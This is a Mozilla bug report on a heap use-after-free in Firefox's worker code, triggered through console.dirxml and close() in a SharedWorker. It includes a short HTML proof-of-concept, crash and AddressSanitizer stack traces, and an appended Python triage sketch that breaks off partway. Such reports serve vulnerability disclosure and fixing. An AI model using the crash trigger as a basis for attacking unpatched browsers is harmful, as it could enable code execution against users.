Closed Bug 1268303 Opened 8 years ago Closed 8 years ago

Console - Use After Free in WorkerPrivate::NotifyFeatures()

Categories

(Core :: DOM: Workers, defect)

49 Branch
x86
All
defect
Not set
normal

Tracking

RESOLVED FIXED
mozilla49
Tracking Status
firefox47 --- unaffected
firefox48 + fixed
firefox49 + fixed
firefox-esr45 --- unaffected

People

(Reporter: loobenyang, Assigned: baku)

Details

(Keywords: csectype-uaf, regression, sec-high, Whiteboard: btpp-active)

Attachments

(2 files)

Reproduce test case (Console_UAF_NotifyFeatures_Repro.html):

<html><body></body>
<script type="text/javascript">
var blob = new Blob(['var a= new String("");interval = setInterval(function(){console.dirxml(a);close();}, 31);'],{type: "text/javascript"});
var wk = new SharedWorker(window.URL.createObjectURL(blob));
setTimeout(function(){location.reload()},300);
</script></html>


Steps to reproduce:

1. Open repro Console_UAF_NotifyFeatures_Repro.html in Firefox browser.
2. Firefox crashes by attempting to execute corrupted arbitrary code address:


Firefox version: 49.0a1 (2016-04-28)

First-chance exception at 0xFFFE47E9 in firefox.exe: 0xC0000005: Access violation executing location 0xFFFE47E9.
Unhandled exception at 0xFFFE47E9 in firefox.exe: 0xC0000005: Access violation executing location 0xFFFE47E9.

 	fffe47e9()	Unknown
 	[Frames below may be incorrect and/or missing]	
>	xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext * aCx, mozilla::dom::workers::Status aStatus) Line 5261	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext * aCx, mozilla::dom::workers::Status aStatus) Line 5745	C++
 	xul.dll!`anonymous namespace'::NotifyRunnable::WorkerRun(JSContext * aCx, mozilla::dom::workers::WorkerPrivate * aWorkerPrivate) Line 892	C++
 	xul.dll!mozilla::dom::workers::WorkerRunnable::Run() Line 376	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() Line 5051	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext * aCx) Line 4514	C++
 	xul.dll!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run() Line 2694	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 989	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 290	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 369	C++
 	xul.dll!MessageLoop::RunHandler() Line 224	C++
 	xul.dll!MessageLoop::Run() Line 204	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 393	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 419	C
 	nss3.dll!pr_root(void * arg) Line 95	C
 	[External Code]

I ran the same test case in an official Linux ASan build; ASan reported a Use After Free in WorkerPrivate::NotifyFeatures():


48.0a1 (2016-04-13)

=================================================================
==7524==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000297d38 at pc 0x7f33feac5f04 bp 0x7f33ba75b870 sp 0x7f33ba75b868
READ of size 8 at 0x608000297d38 thread T50 (DOM Worker)
    #0 0x7f33feac5f03 in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207
    #1 0x7f33feac1684 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5684
    #2 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #3 0x7f33feac11e5 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4995
    #4 0x7f33feabf52c in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4455
    #5 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #6 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #7 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #8 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #9 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #10 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #11 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #12 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396
    #13 0x7f340f0353ef in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216
    #14 0x7f3412557181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #15 0x7f341165847c (/lib/x86_64-linux-gnu/libc.so.6+0xfa47c)

0x608000297d38 is located 24 bytes inside of 88-byte region [0x608000297d20,0x608000297d78)
freed by thread T50 (DOM Worker) here:
    #0 0x471fe1 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f33f8d8d9cc in nsRunnable::Release() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:35
    #2 0x7f33fb607646 in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:39
    #3 0x7f33fb607646 in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:377
    #4 0x7f33fb607646 in ~RefPtr /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77
    #5 0x7f33fb607646 in ~ConsoleReleaseRunnable /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:434
    #6 0x7f33fb607646 in mozilla::dom::ConsoleRunnable::PostDispatch()::ConsoleReleaseRunnable::~ConsoleReleaseRunnable() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:434
    #7 0x7f33feae376c in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:213
    #8 0x7f33feae376c in mozilla::dom::workers::WorkerControlRunnable::Release() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:573
    #9 0x7f33feac1220 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4999
    #10 0x7f33feaed56d in ProcessAllControlRunnables /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.h:1386
    #11 0x7f33feaed56d in OnProcessNextEvent /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4581
    #12 0x7f33feaed56d in mozilla::dom::workers::WorkerThread::Observer::OnProcessNextEvent(nsIThreadInternal*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerThread.cpp:334
    #13 0x7f33f8d148bd in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:968
    #14 0x7f33f8d8e9de in NS_ProcessPendingEvents(nsIThread*, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:232
    #15 0x7f33feac1765 in ClearMainEventQueue /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5025
    #16 0x7f33feac1765 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5695
    #17 0x7f33fcd7509a in mozilla::dom::WorkerGlobalScopeBinding_workers::close(JSContext*, JS::Handle<JSObject*>, mozilla::dom::workers::WorkerGlobalScope*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/WorkerGlobalScopeBinding.cpp:184
    #18 0x7f33fcd6a417 in mozilla::dom::WorkerGlobalScopeBinding_workers::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/WorkerGlobalScopeBinding.cpp:1370
    #19 0x7f340300db4c in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #20 0x7f340300db4c in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:476
    #21 0x7f340304f505 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2807
    #22 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #23 0x7f340300e12f in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:494
    #24 0x7f3403060564 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value const*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:528
    #25 0x7f3402be8288 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2852
    #26 0x7f33feace867 in mozilla::dom::workers::WorkerPrivate::RunExpiredTimeouts(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:6058
    #27 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #28 0x7f33f8d2ea84 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:527
    #29 0x7f33f8d08815 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #30 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #31 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #32 0x7f33feabf81e in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4547
    #33 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #34 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #35 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #36 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #37 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #38 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #39 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #40 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396

previously allocated by thread T50 (DOM Worker) here:
    #0 0x4721e1 in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48b8dd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f33fb5c4eba in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f33fb5c4eba in mozilla::dom::Console::Method(JSContext*, mozilla::dom::Console::MethodName, nsAString_internal const&, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:1442
    #4 0x7f33fb5c65c5 in mozilla::dom::Console::Dirxml(JSContext*, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:1058
    #5 0x7f33fcf50fec in mozilla::dom::ConsoleBinding::dirxml(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Console*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/ConsoleBinding.cpp:2528
    #6 0x7f33fd50fd25 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2778
    #7 0x7f340300db4c in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #8 0x7f340300db4c in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:476
    #9 0x7f340304f505 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2807
    #10 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #11 0x7f340300e12f in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:494
    #12 0x7f3403060564 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value const*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:528
    #13 0x7f3402be8288 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2852
    #14 0x7f33feace867 in mozilla::dom::workers::WorkerPrivate::RunExpiredTimeouts(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:6058
    #15 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #16 0x7f33f8d2ea84 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:527
    #17 0x7f33f8d08815 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #18 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #19 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #20 0x7f33feabf81e in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4547
    #21 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #22 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #23 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #24 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #25 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #26 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #27 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #28 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396
    #29 0x7f340f0353ef in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216
    #30 0x7f3412557181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T50 (DOM Worker) created by T0 here:
    #0 0x45ea55 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7f340f031b40 in _PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457
    #2 0x7f340f0316aa in PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548
    #3 0x7f33f8d11e3d in nsThread::Init() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:526
    #4 0x7f33feaecb1a in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerThread.cpp:92
    #5 0x7f33fe9cca6f in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:1720
    #6 0x7f33fe9ca5cf in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:1547
    #7 0x7f33feabb71a in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString_internal const&, bool, mozilla::dom::WorkerType, nsACString_internal const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4112
    #8 0x7f33fe9d2932 in mozilla::dom::workers::RuntimeService::CreateSharedWorkerFromLoadInfo(JSContext*, mozilla::dom::workers::WorkerLoadInfo*, nsAString_internal const&, nsACString_internal const&, mozilla::dom::workers::SharedWorker**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2301
    #9 0x7f33fe9d22be in mozilla::dom::workers::RuntimeService::CreateSharedWorker(mozilla::dom::GlobalObject const&, nsAString_internal const&, nsACString_internal const&, mozilla::dom::workers::SharedWorker**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2255
    #10 0x7f33fea79324 in mozilla::dom::workers::SharedWorker::Constructor(mozilla::dom::GlobalObject const&, JSContext*, nsAString_internal const&, mozilla::dom::Optional<nsAString_internal> const&, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/SharedWorker.cpp:68
    #11 0x7f33fc8d6e63 in mozilla::dom::SharedWorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/SharedWorkerBinding.cpp:241
    #12 0x7f3403060b19 in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #13 0x7f3403060b19 in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:268
    #14 0x7f3403060b19 in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:565
    #15 0x7f340304f4be in ConstructFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:592
    #16 0x7f340304f4be in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2799
    #17 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #18 0x7f3403061a2b in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:682
    #19 0x7f340306202f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:714
    #20 0x7f3402bfa934 in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::Handle<js::StaticScope*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4466
    #21 0x7f3402bfb3a7 in Evaluate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4493
    #22 0x7f3402bfb3a7 in JS::Evaluate(JSContext*, JS::AutoVectorRooter<JSObject*>&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4554
    #23 0x7f33fb948fc6 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:212
    #24 0x7f33fb949c81 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:279
    #25 0x7f33fb9d364b in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1141
    #26 0x7f33fb9d03c4 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:961
    #27 0x7f33fb9c9c4c in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:726
    #28 0x7f33fb9c660e in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptElement.cpp:142
    #29 0x7f33fac18ee4 in operator-> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsIScriptElement.h:221
    #30 0x7f33fac18ee4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:666
    #31 0x7f33fac17534 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:491
    #32 0x7f33fac1d70b in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128
    #33 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #34 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #35 0x7f33f9a80dee in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:98
    #36 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #37 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #38 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #39 0x7f33fefc7057 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156
    #40 0x7f3400e79248 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #41 0x7f3400f781da in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4340
    #42 0x7f3400f79446 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4437
    #43 0x7f3400f7a28e in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4543
    #44 0x48a793 in do_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #45 0x48a793 in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #46 0x7f341157fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207 mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status)
==7524==ABORTING
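
A triage sketch for the ASan report above, added here as an example (it is not part of the bug report or of Mozilla's tooling): it parses the use, free and allocation stacks and skips allocator and refcount frames to name the first meaningful frame in each. The embedded report is abridged from the one on this page; the plumbing-frame pattern and the names `parse_asan_uaf`, `first_meaningful` and `triage` are assumptions of this example.

```python
import re

# Abridged from the ASan report on this page: frames trimmed and the build-path
# prefixes shortened to "src/"; nothing else changed.
SAMPLE_REPORT = """\
==7524==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000297d38 at pc 0x7f33feac5f04 bp 0x7f33ba75b870 sp 0x7f33ba75b868
READ of size 8 at 0x608000297d38 thread T50 (DOM Worker)
    #0 0x7f33feac5f03 in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) src/dom/workers/WorkerPrivate.cpp:5207
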